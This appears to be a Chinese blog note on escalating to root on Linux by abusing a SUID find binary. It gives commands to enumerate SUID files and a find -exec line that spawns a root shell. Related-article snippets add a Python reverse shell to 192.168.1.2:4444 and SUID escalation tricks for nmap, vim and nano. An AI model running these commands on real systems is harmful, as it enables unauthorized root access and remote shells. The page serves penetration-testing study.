小记SUID -find提权

最新推荐文章于 2025-03-23 12:02:16 发布
原创 最新推荐文章于 2025-03-23 12:02:16 发布 · 2.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SUID #FIND #shell

本文介绍了一种通过使用Linux的find命令结合特定参数来获取系统root权限的方法。通过执行特定的find命令并利用其执行漏洞,可以在某些情况下获得一个具有root权限的shell。这种方法依赖于系统中是否存在可利用的权限配置错误。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

如果有find执行
touch test
find . -exec /bin/sh ; -quit
这时候,你就拥有了root权限的一个shell。

操作系统升(十九)之Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2282
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
WEB渗透Linux-SUID
qq_59468567的博客
09-06 359
$touch xxx $/usr/bin/find xxx –exec whoami \; $/usr/bin/find xxx –exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen
SUID
snowlyzz的博客
08-14 1913
久经不衰的SUID
Linux————利用SUID
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
SUID
一只web狗
07-01 1万+
SUID介绍
【渗透测试】--- suid
qq_43168364的博客
01-13 975
可以用suid取的命令(前是这些命令设置了suid限) nmap vim nano find bash more less cp awk man 1.nmap 执行:nmap --script=exe.nse,脚本中的内容写:os.execute("/bin/bash") 2.vim 进入vim的编辑模式,执行::set shell=/bin/bash ; :shell 3.nano 执行:nano /etc/passwd , 即可添加root用户 4.find 执行:find /
Linux--SUID&内核漏洞本地用户
2401_84968693的博客
05-17 1086
目录SUID漏洞成因过程:手工命令探针:参考利用:脚本探针:LinEnum.shtraitorlinuxprivchecker等等…Linux命令的利用:find命令利用nc反弹利用python反弹–棱角内核漏洞本地用户过程:探针项目:命令执行: https://gtfobins.github.io/https://pentestlab.blog/2017/09/25/suid-executables/GitHub - rebootuser/LinEnum: Scripted Local L
-linux手法总结
01-14
### -linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
小记 SUID find
crispr的博客
01-29 6226
find 姿势一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \; -quit 姿势二 touch getshell find / -type f -name getshell -exec "whoami" \; find / -type f -name getshell -exec "/bin/sh" \...
SUID(一)
02-19 560
大家好,我是东北码农。今天和大家分享linux下的SUID。 本文会按照下面主题进行分享: 什么是 什么是SUID 用户、进程凭证、文件限 下一篇文章会分享: CVE-2021-4034 漏洞讲解 CVE-2021-4034 利用实战 这个漏洞发现还不到3个月,应该还可以用奥。 0x1 什么是 最近研究了一下CVE-2021-4034,利用polkit在linux上得漏洞。就是一个非root用户,不知道root密码,利用漏洞获得root限的过程。 看一下CVE-2
Linux SUID
柠檬木有枝
01-27 4907
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 限位文件0x02 常用方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
Linux:SUID
Elite的博客
03-05 3035
find命令为例,讲解SUID原理
suid梳理
Starr
03-13 2464
参考文章: https://www.freebuf.com/articles/web/272617.html SUID的概念,不多赘述。 查找具有suid限的可执行文件: find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; 执行suid程序时若能执行命令,则可以利用。 nma
Linux SUID
最新发布
zmx999999的博客
03-23 531
GTFOBins 是一个专注于 Unix/Linux 系统(Privilege Escalation)和限绕过(Bypass) 的威开源项目,它收集了大量常见系统程序(如 find、vim、nmap 等)的利用方法,帮助安全研究人员和 CTF 选手快速识别和利用配置不当的程序获取更高限。
suid(特殊限位)
ZY95001的博客
07-28 1933
一、
详细讲解suidfind的使用
03-01
好的,我现在需要详细讲解SUIDfind命令的使用。首先,我得确保自己正确理解SUID的概念。SUID是Set User ID的缩写,当可执行文件设置了SUID限时,运行该文件的用户会以文件所有者的限执行。例如,如果某个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值